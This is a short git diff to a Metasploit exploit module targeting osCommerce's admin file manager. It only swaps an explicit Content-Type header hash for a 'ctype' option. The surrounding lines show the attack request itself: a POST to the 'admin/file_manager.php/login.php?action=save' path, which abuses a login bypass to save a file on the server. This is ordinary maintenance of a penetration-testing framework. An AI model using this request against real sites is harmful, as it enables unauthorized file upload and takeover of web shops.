diff --git a/modules/exploits/unix/webapp/oscommerce_filemanager.rb b/modules/exploits/unix/webapp/oscommerce_filemanager.rb index 6a1540b327..51d6d0c8f9 100644 --- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb +++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb @@ -79,11 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(datastore['URI'], "admin/file_manager.php/login.php") + "?action=save", 'method' => 'POST', 'data' => data, - 'headers' => - { - 'Content-Type' => 'application/x-www-form-urlencoded', - 'Content-Length' => data.length, - } + 'ctype' => 'application/x-www-form-urlencoded' }, 3) # If the upload worked, the server tries to redirect us to some info